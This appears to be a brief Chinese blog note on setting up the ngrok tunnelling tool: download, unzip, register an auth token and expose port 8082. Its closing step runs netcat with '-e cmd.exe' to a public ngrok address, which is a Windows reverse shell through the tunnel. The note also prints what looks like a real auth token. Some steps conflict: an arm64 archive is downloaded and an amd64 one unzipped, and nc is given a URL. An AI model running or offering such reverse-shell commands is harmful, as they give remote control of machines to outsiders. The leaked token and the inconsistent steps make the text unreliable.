• 官网

https://ngrok.com/

  • 下载

    1. wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm64.zip
  • 解压缩

    1. cd /share/
    2. unzip ngrok-stable-linux-amd64.zip
  • 验证

    1. ./ngrok authtoken <your_auth_token>
    2. # 可使用GitHub进行注册,得到一串auth_token
    3. ./ngrok authtoken 1f20YtlN9z5mpVq9f6w9ZeJEcZ0_2vmxDzMutkV1wNbgx1t2C
  • 帮助文档

    1. ./ngrok help
  • 运行

    1. ./ngrok http 8082
  • 验证

    1. nc -vv <yourserver> <port> -e c:\Windows\System32\cmd.exe
    2. nc -vv http://a9ea91eebfc8.ngrok.io 8082 -e c:\Windows\System32\cmd.exe

    参考

    OSCHINA:CentOS7.x搭建ngrok内网穿透
    https://my.oschina.net/yun7/blog/2874128